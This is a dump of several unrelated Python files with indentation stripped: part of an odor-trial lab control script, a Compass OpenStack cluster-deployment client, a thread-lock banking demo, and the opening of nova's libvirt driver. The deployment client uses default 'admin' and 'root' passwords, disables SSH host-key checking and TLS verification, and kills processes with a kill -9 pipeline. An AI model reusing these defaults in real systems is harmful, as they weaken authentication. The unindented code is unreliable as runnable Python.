tnsy.write("MFC " + str(active_valve) + " " + str(MFC_air) + " " + str(HairR) + "\r")
tnsy.write("MFC " + str(active_valve) + " " + str(MFC_n2) + " " + str(Hn2R) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_air) + " " + str(HairL) + "\r")
tnsy.write("MFC " + str(low_valve) + " " + str(MFC_n2) + " " + str(Hn2L) + "\r")
if port_val == 1:
tnsy.write("vialOn " + str(active_valve) + " " + str(odor_vial) + "\r")
tnsy.write("vialOn " + str(low_valve) + " " + str(odor_vial) + "\r")
if active_valve == 2:
tnsy.write("vialOn " + str(active_valve) + " " + str(odor_vial2) + "\r")
tnsy.write("vialOn " + str(low_valve) + " " + str(odor_vial2) + "\r")
iti_timeout_start = math.floor(timer()) #start vial timer
prep_odor = False #odor has been decided
if (math.floor(timer()) >= math.floor(iti_timeout_start + iti_delay)): #vial mixing timer
if msg == 3:
tstart = timer() - session_start; #timestamp trial start (in ms)
tnsy.write("valve " + str(port_val) + " 1 on\r") #turn on FVs
tnsy.write("valve " + str(low_valve) + " 1 on\r")
state = 2 #update trial variables
print("Trial " + str(trial_num) + " Activated: " + nameoftrialtype) #report trial start
# [State 2] TRIAL DECISION
if state == 2:
#Frame Count of Section Occupancy
if (section_occupancy == last_occupancy):
if (section_occupancy == correctindex):
counter = counter + 1
else: counter = 0; last_occupancy = section_occupancy
else: counter = 0; last_occupancy = section_occupancy
#Decision Status
if (counter == count_requirement):
print("Response registered: ") #report response
tnsy.write("valve " + str(port_val) + " 1 off\r") #turn off final valves
tnsy.write("valve " + str(low_valve) + " 1 off\r")
state = 3; counter = 0; #update trial statistics
# [State 3] REWARD DELIVERY
if state == 3:
if port_val == leftport:
if msg == 2:
total0 = total0 + 1; total0L = total0L + 1; correct0 = correct0 + 1; correct0L = correct0L + 1
fmon_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmon_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = rightport #update trial variables
if port_val == rightport:
if msg == 1:
total0 = total0 + 1; total0R = total0R + 1; correct0 = correct0 + 1; correct0R = correct0R + 1
fmon_serial.deliver_reward(msg) #deliver reward
print("Reward Delivered.") #report reward delivery
tend = timer() - session_start #timestamp trial end & record trial summary info
fmon_datamgt.write_trialsummary(trialsummary_file,trial_num,concentration_setting, port_val,response,tstart,tend)
state = 1; prep_odor = True; iti_delay = iti_correct;trial_num = trial_num + 1; port_val = leftport #update trial variables
# [SHUT DOWN] #
print "Session Ended." #report end of session
notepad = str(input("Please record notes here. Be precise and thorough. Write inside quotation marks with no space at the end.")) + '\n'
#Close All Data Files
ch0_handle.close();ch1_handle.close();ch2_handle.close();ch3_handle.close();
nx_handle.close();ny_handle.close();hx_handle.close();hy_handle.close();cx_handle.close();cy_handle.close(); ts_handle.close()
print "Data Collection Ended" #report end of data collection
##EXIT PROGRAM
fmon_serial.close_all_valves(); cv2.destroyAllWindows(); ard.close(); tnsy.close()
fraction_correct = "T: "+str(correct0)
fraction_left = "L: "+str(correct0L)
fraction_right = "R: "+str(correct0R)
print(fraction_correct)
print(fraction_left)
print(fraction_right)
performance_report = "Total Trials: " + str(correct0)
#Write Video Locator
fmon_datamgt.write_vidlocator(video_file,localtime)
fmon_datamgt.record_notes(notes_file,session_num,localtime,notepad,performance_report)
|
client.py
|
#!/usr/bin/env python
#
# Copyright 2014 Huawei Technologies Co. Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""binary to deploy a cluster by compass client api."""
import os
import re
import socket
import sys
import time
import yaml
import netaddr
import requests
import json
import itertools
import threading
from collections import defaultdict
from restful import Client
ROLE_UNASSIGNED = True
ROLE_ASSIGNED = False
import log as logging
LOG = logging.getLogger(__name__)
from oslo_config import cfg
CONF = cfg.CONF
def byteify(input):
if isinstance(input, dict):
return dict([(byteify(key),byteify(value)) for key,value in input.iteritems()])
elif isinstance(input, list):
return [byteify(element) for element in input]
elif isinstance(input, unicode):
return input.encode('utf-8')
else:
return input
opts = [
cfg.StrOpt('compass_server',
help='compass server url',
default='http://127.0.0.1/api'),
cfg.StrOpt('compass_user_email',
help='compass user email',
default='admin@huawei.com'),
cfg.StrOpt('compass_user_password',
help='compass user password',
default='admin'),
cfg.StrOpt('switch_ips',
help='comma separated switch ips',
default=''),
cfg.StrOpt('switch_credential',
help='comma separated <credential key>=<credential value>',
default='version=2c,community=public'),
cfg.IntOpt('switch_max_retries',
help='max retries of poll switch',
default=10),
cfg.IntOpt('switch_retry_interval',
help='interval to repoll switch',
default=10),
cfg.BoolOpt('poll_switches',
help='if the client polls switches',
default=True),
cfg.StrOpt('machines',
help='comma separated mac addresses of machines',
default=''),
cfg.StrOpt('subnets',
help='comma separated subnets',
default=''),
cfg.StrOpt('adapter_name',
help='adapter name',
default=''),
cfg.StrOpt('adapter_os_pattern',
help='adapter os name',
default=r'^(?i)centos.*'),
cfg.StrOpt('adapter_target_system_pattern',
help='adapter target system name',
default='^openstack$'),
cfg.StrOpt('adapter_flavor_pattern',
help='adapter flavor name',
default='allinone'),
cfg.StrOpt('cluster_name',
help='cluster name',
default='cluster1'),
cfg.StrOpt('language',
help='language',
default='EN'),
cfg.StrOpt('timezone',
help='timezone',
default='GMT'),
cfg.StrOpt('http_proxy',
help='http proxy',
default=''),
cfg.StrOpt('https_proxy',
help='https proxy',
default=''),
cfg.StrOpt('no_proxy',
help='no proxy',
default=''),
cfg.StrOpt('ntp_server',
help='ntp server',
default=''),
cfg.StrOpt('dns_servers',
help='dns servers',
default=''),
cfg.StrOpt('domain',
help='domain',
default=''),
cfg.StrOpt('search_path',
help='search path',
default=''),
cfg.StrOpt('local_repo_url',
help='local repo url',
default=''),
cfg.StrOpt('default_gateway',
help='default gateway',
default=''),
cfg.StrOpt('server_credential',
help=(
'server credential formatted as '
'<username>=<password>'
),
default='root=root'),
cfg.StrOpt('os_config_json_file',
help='json formatted os config file',
default=''),
cfg.StrOpt('service_credentials',
help=(
'comma separated service credentials formatted as '
'<servicename>:<username>=<password>,...'
),
default=''),
cfg.StrOpt('console_credentials',
help=(
'comma separated console credential formatted as '
'<consolename>:<username>=<password>'
),
default=''),
cfg.StrOpt('hostnames',
help='comma separated hostnames',
default=''),
cfg.StrOpt('host_networks',
help=(
'semicolon separated host name and its networks '
'<hostname>:<interface_name>=<ip>|<is_mgmt>|<is_promiscuous>,...'
),
default=''),
cfg.StrOpt('partitions',
help=(
'comma separated partitions '
'<partition name>=<partition_value>'
),
default='tmp:percentage=10%,var:percentage=30%,home:percentage=30%'),
cfg.StrOpt('network_mapping',
help=(
'comma separated network mapping '
'<network_type>=<interface_name>'
),
default=''),
cfg.StrOpt('package_config_json_file',
help='json formatted os config file',
default=''),
cfg.StrOpt('host_roles',
help=(
'semicolon separated host roles '
'<hostname>=<comma separated roles>'
),
default=''),
cfg.StrOpt('default_roles',
help=(
'comma separated default roles '
'<rolename>'
),
default=''),
cfg.IntOpt('action_timeout',
help='action timeout in seconds',
default=60),
cfg.IntOpt('deployment_timeout',
help='deployment timeout in minutes',
default=60),
cfg.IntOpt('progress_update_check_interval',
help='progress update status check interval in seconds',
default=60),
cfg.StrOpt('dashboard_url',
help='dashboard url',
default=''),
cfg.StrOpt('dashboard_link_pattern',
help='dashboard link pattern',
default=r'(?m)(http://\d+\.\d+\.\d+\.\d+:5000/v2\.0)'),
cfg.StrOpt('cluster_vip',
help='cluster ip address',
default=''),
cfg.StrOpt('enable_secgroup',
help='enable security group',
default='true'),
cfg.StrOpt('enable_vpnaas',
help='enable vpn as service',
default='true'),
cfg.StrOpt('enable_fwaas',
help='enable firewall as service',
default='true'),
cfg.StrOpt('network_cfg',
help='network config file',
default=''),
cfg.StrOpt('neutron_cfg',
help='network config file',
default=''),
cfg.StrOpt('cluster_pub_vip',
help='cluster ip address',
default=''),
cfg.StrOpt('cluster_prv_vip',
help='cluster ip address',
default=''),
cfg.StrOpt('repo_name',
help='repo name',
default=''),
cfg.StrOpt('deploy_type',
help='deploy type',
default='virtual'),
cfg.StrOpt('deploy_flag',
help='deploy flag',
default='deploy'),
cfg.StrOpt('rsa_file',
help='ssh rsa key file',
default=''),
cfg.StrOpt('odl_l3_agent',
help='odl l3 agent enable flag',
default='Disable'),
]
CONF.register_cli_opts(opts)
def is_role_unassigned(role):
return role
def _load_config(config_filename):
if not config_filename:
return {}
with open(config_filename) as config_file:
content = config_file.read()
return json.loads(content)
class CompassClient(object):
def __init__(self):
LOG.info("xh: compass_server=%s" % CONF.compass_server)
self.client = Client(CONF.compass_server)
self.subnet_mapping = {}
self.role_mapping = {}
self.host_mapping = {}
self.host_ips = defaultdict(list)
self.host_roles = {}
self.login()
def is_ok(self, status):
if status < 300 and status >= 200:
return True
def login(self):
status, resp = self.client.get_token(
CONF.compass_user_email,
CONF.compass_user_password
)
LOG.info(
'login status: %s, resp: %s',
status, resp
)
if self.is_ok(status):
return resp["token"]
else:
raise Exception(
'failed to login %s with user %s'
% (CONF.compass_server, CONF.compass_user_email)
)
def get_machines(self):
status, resp = self.client.list_machines()
if not self.is_ok(status):
LOG.error(
'get all machines status: %s, resp: %s', status, resp)
raise RuntimeError('failed to get machines')
machines_to_add = list(set([
machine for machine in CONF.machines.split(',')
if machine
]))
machines_db = [str(m["mac"]) for m in resp]
LOG.info('machines in db: %s\n to add: %s', machines_db, machines_to_add)
if not set(machines_to_add).issubset(set(machines_db)):
raise RuntimeError('unidentified machine to add')
return [m["id"] for m in resp if str(m["mac"]) in machines_to_add]
def list_clusters(self):
status, resp = self.client.list_clusters(name=CONF.cluster_name)
if not self.is_ok(status) or not resp:
raise RuntimeError('failed to list cluster')
cluster = resp[0]
return cluster['id']
def get_adapter(self):
"""get adapter."""
status, resp = self.client.list_adapters(name=CONF.adapter_name)
LOG.info(
'get all adapters status: %s, resp: %s',
status, resp
)
if not self.is_ok(status) or not resp:
raise RuntimeError('failed to get adapters')
os_re = re.compile(CONF.adapter_os_pattern)
flavor_re = re.compile(CONF.adapter_flavor_pattern)
adapter_id = None
os_id = None
flavor_id = None
adapter = None
adapter = resp[0]
adapter_id = adapter['id']
for supported_os in adapter['supported_oses']:
if not os_re or os_re.match(supported_os['name']):
os_id = supported_os['os_id']
break
if 'flavors' in adapter:
for flavor in adapter['flavors']:
if not flavor_re or flavor_re.match(flavor['name']):
flavor_id = flavor['id']
break
assert(os_id and flavor_id)
return (adapter_id, os_id, flavor_id)
def add_subnets(self):
subnets = [
subnet for subnet in CONF.subnets.split(',')
if subnet
]
assert(subnets)
subnet_mapping = {}
for subnet in subnets:
try:
netaddr.IPNetwork(subnet)
except:
raise RuntimeError('subnet %s format is invalid' % subnet)
status, resp = self.client.add_subnet(subnet)
LOG.info('add subnet %s status %s response %s',
subnet, status, resp)
if not self.is_ok(status):
raise RuntimeError('failed to add subnet %s' % subnet)
subnet_mapping[resp['subnet']] = resp['id']
self.subnet_mapping = subnet_mapping
def add_cluster(self, adapter_id, os_id, flavor_id):
"""add a cluster."""
cluster_name = CONF.cluster_name
assert(cluster_name)
status, resp = self.client.add_cluster(
cluster_name, adapter_id,
os_id, flavor_id)
if not self.is_ok(status):
raise RuntimeError("add cluster failed")
LOG.info('add cluster %s status: %s resp:%s',
cluster_name, status,resp)
if isinstance(resp, list):
cluster = resp[0]
else:
cluster = resp
cluster_id = cluster['id']
flavor = cluster.get('flavor', {})
roles = flavor.get('roles', [])
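# role_mapping records which of the flavor's roles still need a host;
# ROLE_UNASSIGNED is True, so is_role_unassigned() simply returns the stored flag.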
for role in roles:
if role.get('optional', False):
self.role_mapping[role['name']] = ROLE_ASSIGNED
else:
self.role_mapping[role['name']] = ROLE_UNASSIGNED
return cluster_id
def add_cluster_hosts(self, cluster_id, machines):
hostnames = [
hostname for hostname in CONF.hostnames.split(',')
if hostname
]
assert(len(machines) == len(hostnames))
machines_dict = []
for machine_id, hostname in zip(machines, hostnames):
machines_dict.append({
'machine_id': machine_id,
'name': hostname
})
# add hosts to the cluster.
status, resp = self.client.add_hosts_to_cluster(
cluster_id,
{'machines': machines_dict})
LOG.info('add machines %s to cluster %s status: %s, resp: %s',
machines_dict, cluster_id, status, resp)
if not self.is_ok(status):
raise RuntimeError("add host to cluster failed")
for host in resp['hosts']:
self.host_mapping[host['hostname']] = host['id']
assert(len(self.host_mapping) == len(machines))
def set_cluster_os_config(self, cluster_id):
"""set cluster os config."""
os_config = {}
language = CONF.language
timezone = CONF.timezone
http_proxy = CONF.http_proxy
https_proxy = CONF.https_proxy
local_repo_url = CONF.local_repo_url
repo_name = CONF.repo_name
deploy_type = CONF.deploy_type
if not https_proxy and http_proxy:
https_proxy = http_proxy
no_proxy = [
no_proxy for no_proxy in CONF.no_proxy.split(',')
if no_proxy
]
compass_server = CONF.compass_server
if http_proxy:
for hostname, ips in self.host_ips.items():
no_proxy.append(hostname)
no_proxy.extend(ips)
ntp_server = CONF.ntp_server or compass_server
dns_servers = [
dns_server for dns_server in CONF.dns_servers.split(',')
if dns_server
]
if not dns_servers:
dns_servers = [compass_server]
domain = CONF.domain
if not domain:
raise Exception('domain is not defined')
search_path = [
search_path for search_path in CONF.search_path.split(',')
if search_path
]
if not search_path:
search_path = [domain]
default_gateway = CONF.default_gateway
if not default_gateway:
raise Exception('default gateway is not defined')
general_config = {
'language': language,
'timezone': timezone,
'ntp_server': ntp_server,
'dns_servers': dns_servers,
'default_gateway': default_gateway
}
if http_proxy:
general_config['http_proxy'] = http_proxy
if https_proxy:
general_config['https_proxy'] = https_proxy
if no_proxy:
general_config['no_proxy'] = no_proxy
if domain:
general_config['domain'] = domain
if search_path:
general_config['search_path'] = search_path
if local_repo_url:
general_config['local_repo'] = local_repo_url
if repo_name:
general_config['repo_name'] = repo_name
if deploy_type:
general_config['deploy_type'] = deploy_type
os_config["general"] = general_config
server_credential = CONF.server_credential
if '=' in server_credential:
server_username, server_password = server_credential.split('=', 1)
elif server_credential:
server_username = server_password = server_credential
else:
server_username = 'root'
server_password = 'root'
os_config['server_credentials'] = {
'username': server_username,
'password': server_password
}
partitions = [
partition for partition in CONF.partitions.split(',')
if partition
]
partition_config = {}
for partition in partitions:
assert("=" in partition)
partition_name, partition_value = partition.split('=', 1)
partition_name = partition_name.strip()
partition_value = partition_value.strip()
assert(partition_name and partition_value)
if partition_value.endswith('%'):
partition_type = 'percentage'
partition_value = int(partition_value[:-1])
else:
partition_type = 'size'
partition_config[partition_name] = {
partition_type: partition_value
}
os_config['partition'] = partition_config
"""
os_config_filename = CONF.os_config_json_file
if os_config_filename:
util.merge_dict(
os_config, _load_config(os_config_filename)
)
"""
status, resp = self.client.update_cluster_config(
cluster_id, os_config=os_config)
LOG.info(
'set os config %s to cluster %s status: %s, resp: %s',
os_config, cluster_id, status, resp)
if not self.is_ok(status):
raise RuntimeError('failed to set os config %s to cluster %s' \
% (os_config, cluster_id))
def set_host_networking(self):
"""set cluster hosts networking."""
def get_subnet(ip_str):
try:
LOG.info("subnets: %s" % self.subnet_mapping.keys())
ip = netaddr.IPAddress(ip_str)
for cidr, subnet_id in self.subnet_mapping.items():
subnet = netaddr.IPNetwork(cidr)
if ip in subnet:
return True, subnet_id
LOG.info("ip %s not in %s" % (ip_str, cidr))
return False, None
except:
LOG.exception("ip addr %s is invalid" % ip_str)
return False, None
for host_network in CONF.host_networks.split(';'):
hostname, networks_str = host_network.split(':', 1)
hostname = hostname.strip()
networks_str = networks_str.strip()
assert(hostname in self.host_mapping)
host_id = self.host_mapping[hostname]
intf_list = networks_str.split(',')
for intf_str in intf_list:
interface, intf_properties = intf_str.split('=', 1)
intf_properties = intf_properties.strip().split('|')
assert(intf_properties)
ip_str = intf_properties[0]
status, subnet_id = get_subnet(ip_str)
if not status:
raise RuntimeError("ip addr %s is invalid" % ip_str)
properties = dict([
(intf_property, True)
for intf_property in intf_properties[1:]
])
LOG.info(
'add host %s interface %s ip %s network properties %s',
hostname, interface, ip_str, properties)
status, response = self.client.add_host_network(
host_id, interface, ip=ip_str, subnet_id=subnet_id,
**properties
)
LOG.info(
'add host %s interface %s ip %s network properties %s '
'status %s: %s',
hostname, interface, ip_str, properties,
status, response
)
if not self.is_ok(status):
raise RuntimeError("add host network failed")
self.host_ips[hostname].append(ip_str)
def set_cluster_package_config(self, cluster_id):
"""set cluster package config."""
package_config = {"security": {}}
service_credentials = [
service_credential
for service_credential in CONF.service_credentials.split(',')
if service_credential
]
service_credential_cfg = {}
LOG.info(
'service credentials: %s', service_credentials
)
for service_credential in service_credentials:
if ':' not in service_credential:
raise Exception(
'there is no : in service credential %s' % service_credential
)
service_name, service_pair = service_credential.split(':', 1)
if '=' not in service_pair:
raise Exception(
'there is no = in service %s security' % service_name
)
username, password = service_pair.split('=', 1)
service_credential_cfg[service_name] = {
'username': username,
'password': password
}
console_credentials = [
console_credential
for console_credential in CONF.console_credentials.split(',')
if console_credential
]
LOG.info(
'console credentials: %s', console_credentials
)
console_credential_cfg = {}
for console_credential in console_credentials:
if ':' not in console_credential:
raise Exception(
'there is no : in console credential %s' % console_credential
)
console_name, console_pair = console_credential.split(':', 1)
if '=' not in console_pair:
raise Exception(
'there is no = in console %s security' % console_name
)
username, password = console_pair.split('=', 1)
console_credential_cfg[console_name] = {
'username': username,
'password': password
}
package_config["security"] = {"service_credentials": service_credential_cfg,
"console_credentials": console_credential_cfg}
network_mapping = dict([
network_pair.split('=', 1)
for network_pair in CONF.network_mapping.split(',')
if '=' in network_pair
])
package_config['network_mapping'] = network_mapping
assert(os.path.exists(CONF.network_cfg))
network_cfg = yaml.load(open(CONF.network_cfg))
package_config["network_cfg"] = network_cfg
assert(os.path.exists(CONF.neutron_cfg))
neutron_cfg = yaml.load(open(CONF.neutron_cfg))
package_config["neutron_config"] = neutron_cfg
"""
package_config_filename = CONF.package_config_json_file
if package_config_filename:
util.merge_dict(
package_config, _load_config(package_config_filename)
)
"""
package_config['ha_proxy'] = {}
if CONF.cluster_vip:
package_config["ha_proxy"]["vip"] = CONF.cluster_vip
package_config['enable_secgroup'] = (CONF.enable_secgroup == "true")
package_config['enable_fwaas'] = (CONF.enable_fwaas == "true")
package_config['enable_vpnaas'] = (CONF.enable_vpnaas == "true")
package_config['odl_l3_agent'] = "Enable" if CONF.odl_l3_agent == "Enable" else "Disable"
status, resp = self.client.update_cluster_config(
cluster_id, package_config=package_config)
LOG.info(
'set package config %s to cluster %s status: %s, resp: %s',
package_config, cluster_id, status, resp)
if not self.is_ok(status):
raise RuntimeError("set cluster package_config failed")
def set_host_roles(self, cluster_id, host_id, roles):
status, response = self.client.update_cluster_host(
cluster_id, host_id, roles=roles)
LOG.info(
'set cluster %s host %s roles %s status %s: %s',
cluster_id, host_id, roles, status, response
)
if not self.is_ok(status):
raise RuntimeError("set host roles failed")
for role in roles:
if role in self.role_mapping:
self.role_mapping[role] = ROLE_ASSIGNED
def set_all_hosts_roles(self, cluster_id):
for host_str in CONF.host_roles.split(';'):
host_str = host_str.strip()
hostname, roles_str = host_str.split('=', 1)
assert(hostname in self.host_mapping)
host_id = self.host_mapping[hostname]
roles = [role.strip() for role in roles_str.split(',') if role]
self.set_host_roles(cluster_id, host_id, roles)
self.host_roles[hostname] = roles
unassigned_hostnames = list(set(self.host_mapping.keys()) \
- set(self.host_roles.keys()))
unassigned_roles = [ role for role, status in self.role_mapping.items()
if is_role_unassigned(status)]
assert(len(unassigned_hostnames) >= len(unassigned_roles))
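# Python 2 idiom: map(None, a, b) pairs the two lists like zip() but pads
# the shorter list with None (equivalent to itertools.izip_longest).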
for hostname, role in map(None, unassigned_hostnames, unassigned_roles):
host_id = self.host_mapping[hostname]
self.set_host_roles(cluster_id, host_id, [role])
self.host_roles[hostname] = [role]
unassigned_hostnames = list(set(self.host_mapping.keys()) \
- set(self.host_roles.keys()))
if not unassigned_hostnames:
return
# assign default roles to unassigned hosts
default_roles = [
role for role in CONF.default_roles.split(',')
if role
]
assert(default_roles)
cycle_roles = itertools.cycle(default_roles)
for hostname in unassigned_hostnames:
host_id = self.host_mapping[hostname]
roles = [cycle_roles.next()]
self.set_host_roles(cluster_id, host_id, roles)
self.host_roles[hostname] = roles
def deploy_clusters(self, cluster_id):
host_ids = self.host_mapping.values()
status, response = self.client.review_cluster(
cluster_id, review={'hosts': host_ids}
)
LOG.info(
'review cluster %s hosts %s, status %s: %s',
cluster_id, host_ids, status, response
)
# TODO: document what the review step above is doing.
if not self.is_ok(status):
raise RuntimeError("review cluster host failed")
status, response = self.client.deploy_cluster(
cluster_id, deploy={'hosts': host_ids}
)
LOG.info(
'deploy cluster %s hosts %s status %s: %s',
cluster_id, host_ids, status, response
)
if not self.is_ok(status):
raise RuntimeError("deploy cluster failed")
def redeploy_clusters(self, cluster_id):
status, response = self.client.redeploy_cluster(
cluster_id
)
if not self.is_ok(status):
LOG.info(
'deploy cluster %s status %s: %s',
cluster_id, status, response
)
raise RuntimeError("redeploy cluster failed")
def get_cluster_state(self, cluster_id):
for _ in range(10):
try:
status, cluster_state = self.client.get_cluster_state(cluster_id)
if self.is_ok(status):
break
except:
status = 500
cluster_state = ""
LOG.error("can not get cluster %s's state, try again" % cluster_id)
time.sleep(6)
return status, cluster_state
def get_installing_progress(self, cluster_id):
def _get_installing_progress():
"""get intalling progress."""
deployment_timeout = time.time() + 60 * float(CONF.deployment_timeout)
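# CONF.deployment_timeout is expressed in minutes; convert it to an
# absolute deadline in epoch seconds.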
current_time = time.time
while current_time() < deployment_timeout:
status, cluster_state = self.get_cluster_state(cluster_id)
if not self.is_ok(status):
raise RuntimeError("can not get cluster state")
elif cluster_state['state'] == 'SUCCESSFUL':
LOG.info(
'get cluster %s state status %s: %s, successful',
cluster_id, status, cluster_state
)
break
elif cluster_state['state'] == 'ERROR':
raise RuntimeError(
'get cluster %s state status %s: %s, error'
% (cluster_id, status, cluster_state)
)
time.sleep(5)
if current_time() >= deployment_timeout:
LOG.info("current_time=%s, deployment_timeout=%s" \
% (current_time(), deployment_timeout))
raise RuntimeError("installation timeout")
try:
_get_installing_progress()
finally:
# do this twice to make sure the process is killed
kill_print_proc()
kill_print_proc()
def check_dashboard_links(self, cluster_id):
dashboard_url = CONF.dashboard_url
if not dashboard_url:
LOG.info('no dashboard url set')
return
dashboard_link_pattern = re.compile(
CONF.dashboard_link_pattern)
r = requests.get(dashboard_url, verify=False)
r.raise_for_status()
match = dashboard_link_pattern.search(r.text)
if match:
LOG.info(
'dashboard login page for cluster %s can be downloaded',
cluster_id)
else:
msg = (
'%s failed to be downloaded\n'
'the context is:\n%s\n'
) % (dashboard_url, r.text)
raise Exception(msg)
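# Tails the remote ansible log over ssh so deployment progress is visible in
# this process; the address 192.168.200.2 and the log path are specific to
# this deployment environment.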
def print_ansible_log():
os.system("ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -i %s root@192.168.200.2 \
'while ! tail -f /var/ansible/run/openstack_liberty-opnfv2/ansible.log 2>/dev/null; do :; sleep 1; done'" % CONF.rsa_file)
def kill_print_proc():
os.system("ps aux|grep -v grep|grep -E 'ssh.+root@192.168.200.2'|awk '{print $2}'|xargs kill -9")
def deploy():
client = CompassClient()
machines = client.get_machines()
LOG.info('machines are %s', machines)
client.add_subnets()
adapter_id, os_id, flavor_id = client.get_adapter()
cluster_id = client.add_cluster(adapter_id, os_id, flavor_id)
client.add_cluster_hosts(cluster_id, machines)
client.set_host_networking()
client.set_cluster_os_config(cluster_id)
if flavor_id:
client.set_cluster_package_config(cluster_id)
client.set_all_hosts_roles(cluster_id)
client.deploy_clusters(cluster_id)
LOG.info("compass OS installtion is begin")
threading.Thread(target=print_ansible_log).start()
client.get_installing_progress(cluster_id)
client.check_dashboard_links(cluster_id)
def redeploy():
client = CompassClient()
cluster_id = client.list_clusters()
client.redeploy_clusters(cluster_id)
client.get_installing_progress(cluster_id)
client.check_dashboard_links(cluster_id)
def main():
if CONF.deploy_flag == "redeploy":
redeploy()
else:
deploy()
if __name__ == "__main__":
CONF(args=sys.argv[1:])
main()
|
safe_bank.py
|
import datetime
import random
import time
from threading import Thread, RLock
from typing import List
class Account:
def __init__(self, balance=0):
self.balance = balance
def main():
accounts = create_accounts()
total = sum(a.balance for a in accounts)
validate_bank(accounts, total)
print("Starting transfers...")
jobs = [
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
Thread(target=do_bank_stuff, args=(accounts, total)),
]
t0 = datetime.datetime.now()
[j.start() for j in jobs]
[j.join() for j in jobs]
dt = datetime.datetime.now() - t0
print("Transfers complete ({:,.2f}) sec".format(dt.total_seconds()))
validate_bank(accounts, total)
def do_bank_stuff(accounts, total):
for _ in range(1, 10_000):
a1, a2 = get_two_accounts(accounts)
amount = random.randint(1, 100)
do_transfer(a1, a2, amount)
validate_bank(accounts, total, quiet=True)
def create_accounts() -> List[Account]:
return [
Account(balance=5000),
Account(balance=10000),
Account(balance=7500),
Account(balance=7000),
Account(balance=6000),
Account(balance=9000),
]
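# A single module-level re-entrant lock shared by every worker thread; both
# do_transfer and validate_bank acquire it, so balance updates and the
# consistency check never interleave.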
transfer_lock = RLock()
def do_transfer(from_account: Account, to_account: Account, amount: int):
if from_account.balance < amount:
return
# Not so good:
# transfer_lock.acquire()
#
# from_account.balance -= amount
# time.sleep(.000)
# to_account.balance += amount
#
# transfer_lock.release()
# good!
with transfer_lock:
from_account.balance -= amount
time.sleep(0.000)
to_account.balance += amount
def validate_bank(accounts: List[Account], total: int, quiet=False):
with transfer_lock:
current = sum(a.balance for a in accounts)
if current != total:
print(
"ERROR: Inconsistent account balance: ${:,} vs ${:,}".format(
current, total
),
flush=True,
)
elif not quiet:
print(
"All good: Consistent account balance: ${:,}".format(total),
flush=True,
)
def get_two_accounts(accounts):
a1 = random.choice(accounts)
a2 = a1
while a2 == a1:
a2 = random.choice(accounts)
return a1, a2
if __name__ == "__main__":
main()
|
driver.py
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
A connection to a hypervisor through libvirt.
Supports KVM, LXC, QEMU, UML, and XEN.
**Related Flags**
:libvirt_type: Libvirt domain type. Can be kvm, qemu, uml, xen
(default: kvm).
:libvirt_uri: Override for the default libvirt URI (depends on libvirt_type).
:libvirt_disk_prefix: Override the default disk prefix for the devices
attached to a server.
:rescue_image_id: Rescue ami image (None = original image).
:rescue_kernel_id: Rescue aki image (None = original image).
:rescue_ramdisk_id: Rescue ari image (None = original image).
:injected_network_template: Template file for injected network
:allow_same_net_traffic: Whether to allow in project network traffic
"""
import errno
import eventlet
import functools
import glob
import os
import shutil
import socket
import sys
import tempfile
import threading
import time
import uuid
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from eventlet import util as eventlet_util
from lxml import etree
from oslo.config import cfg
from nova.api.metadata import base as instance_metadata
from nova import block_device
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import task_states
from nova.compute import utils as compute_utils
from nova.compute import vm_mode
from nova import context as nova_context
from nova import exception
from nova.image import glance
from nova import notifier
from nova.objects import instance as instance_obj
from nova.objects import service as service_obj
from nova.openstack.common import excutils
from nova.openstack.common import fileutils
from nova.openstack.common.gettextutils import _
from nova.openstack.common import importutils
from nova.openstack.common import jsonutils
from nova.openstack.common import log as logging
from nova.openstack.common import loopingcall
from nova.openstack.common import processutils
from nova.openstack.common import xmlutils
from nova.pci import pci_manager
from nova.pci import pci_utils
from nova.pci import pci_whitelist
from nova import unit
from nova import utils
from nova import version
from nova.virt import configdrive
from nova.virt.disk import api as disk
from nova.virt import driver
from nova.virt import event as virtevent
from nova.virt import firewall
from nova.virt.libvirt import blockinfo
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import firewall as libvirt_firewall
from nova.virt.libvirt import imagebackend
from nova.virt.libvirt import imagecache
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt import netutils
from nova import volume
from nova.volume import encryptors
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue")
libvirt = None
LOG = logging.getLogger(__name__)
libvirt_opts = [
cfg.StrOpt('rescue_image_id',
help='Rescue ami image'),
cfg.StrOpt('rescue_kernel_id',
help='Rescue aki image'),
cfg.StrOpt('rescue_ramdisk_id',
help='Rescue ari image'),
cfg.StrOpt('libvirt_type',
default='kvm',
help='Libvirt domain type (valid options are: '
'kvm, lxc, qemu, uml, xen)'),
cfg.StrOpt('libvirt_uri',
default='',
help='Override the default libvirt URI '
'(which is dependent on libvirt_type)'),
